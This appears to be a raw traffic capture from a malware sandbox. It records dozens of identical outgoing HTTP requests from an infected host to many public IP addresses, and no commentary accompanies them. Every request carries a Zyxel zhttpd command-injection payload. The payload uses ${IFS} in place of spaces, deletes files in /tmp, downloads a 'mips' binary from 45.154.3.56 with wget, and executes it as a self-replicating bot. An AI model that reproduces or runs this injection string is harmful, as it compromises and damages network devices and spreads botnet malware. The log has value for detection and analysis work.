                        Mar 12, 2024 08:50:25.000344038 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        396192.168.2.1451130180.216.99.60443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.000380039 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        397192.168.2.1450038108.108.48.79443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.000411987 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        398192.168.2.1460750170.32.168.158443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.000469923 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        399192.168.2.1440956152.142.169.75443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.000515938 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        400192.168.2.1450826205.238.183.172443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.000559092 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        401192.168.2.1460868125.113.189.127443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.000591040 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        402192.168.2.144821282.86.27.54443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.000648022 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        403192.168.2.14532328.57.201.185443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.000674009 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        404192.168.2.1439212160.160.183.154443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.000720024 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        405192.168.2.1450286136.42.133.56443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.000766039 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        406192.168.2.144683819.54.244.185443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.000780106 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        407192.168.2.143638825.179.130.29443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.000834942 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        408192.168.2.1453530171.128.74.153443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.000896931 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        409192.168.2.1433128108.228.168.25443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.000929117 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        410192.168.2.144807614.153.211.35443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.001000881 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        411192.168.2.145575044.50.234.222443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.001033068 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        412192.168.2.1460128173.199.62.235443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.001061916 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        413192.168.2.1456398124.139.31.45443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.001115084 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        414192.168.2.1459772147.90.250.240443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.001140118 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        415192.168.2.1435518152.152.129.15443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.001202106 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        416192.168.2.1446822115.130.239.108443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.001224041 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        417192.168.2.145341039.25.0.108443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.001260996 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        418192.168.2.1436194163.160.84.243443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.001296043 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        419192.168.2.145967461.64.245.14443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.001352072 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        420192.168.2.1451840140.231.144.75443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.001391888 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        421192.168.2.1447392205.127.116.77443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.001463890 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        422192.168.2.1441142150.223.182.247443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.001527071 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        423192.168.2.1441194174.17.194.58443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.001580954 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        424192.168.2.1446310211.230.8.24443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.001630068 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        425192.168.2.144149043.131.186.209443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.001692057 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        426192.168.2.1434930150.149.110.0443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.001729012 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        427192.168.2.1442768165.183.36.54443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.001776934 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        428192.168.2.1445540203.153.56.218443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.001847029 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        429192.168.2.143357063.159.227.27443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.001914024 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        430192.168.2.144911274.248.197.135443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.001945019 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        431192.168.2.1433306212.144.16.248443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.002003908 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        432192.168.2.1453002151.24.110.82443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.002038956 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        433192.168.2.1440210133.22.164.154443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.002057076 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        434192.168.2.144884274.142.241.79443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.002126932 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        435192.168.2.1435382105.68.217.248443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.002156973 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        436192.168.2.1454064106.39.104.58443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.002207994 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        437192.168.2.143936643.20.19.215443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.002232075 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        438192.168.2.144931238.47.30.209443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.002264977 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        439192.168.2.145405253.34.23.251443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.002326012 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        440192.168.2.1442860173.54.249.168443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.002361059 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        441192.168.2.143304647.255.44.8443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.002413034 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        442192.168.2.144907469.6.86.1443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.002449036 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        443192.168.2.144312879.19.0.201443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.002487898 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        444192.168.2.1454442159.95.101.253443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.002543926 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        445192.168.2.1460716192.2.142.200443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.002598047 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        446192.168.2.1437688162.106.142.117443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.002660036 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        447192.168.2.1441386194.17.215.211443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.002691984 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        448192.168.2.1445190124.56.81.162443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.002757072 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        449192.168.2.1440902136.172.14.245443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.002801895 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        450192.168.2.1444856151.235.145.114443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.002861023 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        451192.168.2.1447624158.88.236.219443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.002898932 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        452192.168.2.1445328125.66.115.56443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.002948046 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        453192.168.2.1458100150.109.35.159443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.002979994 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        454192.168.2.1435476161.77.254.163443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.003041029 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        455192.168.2.143445239.84.35.218443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.003081083 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        456192.168.2.144178695.172.158.39443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.003098965 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        457192.168.2.143349657.177.65.38443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.003154993 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        458192.168.2.1434758162.208.214.83443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.003180981 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        459192.168.2.1444574168.232.242.183443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.003245115 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        460192.168.2.1452026141.186.221.182443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.003281116 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        461192.168.2.1449172217.143.104.80443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.003334045 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        462192.168.2.1448314187.222.101.152443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.003365040 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        463192.168.2.1435964161.11.93.85443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.003408909 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        464192.168.2.1445926114.137.231.200443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.003432989 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        465192.168.2.1450012151.167.36.181443
                        TimestampBytes transferredDirectionData
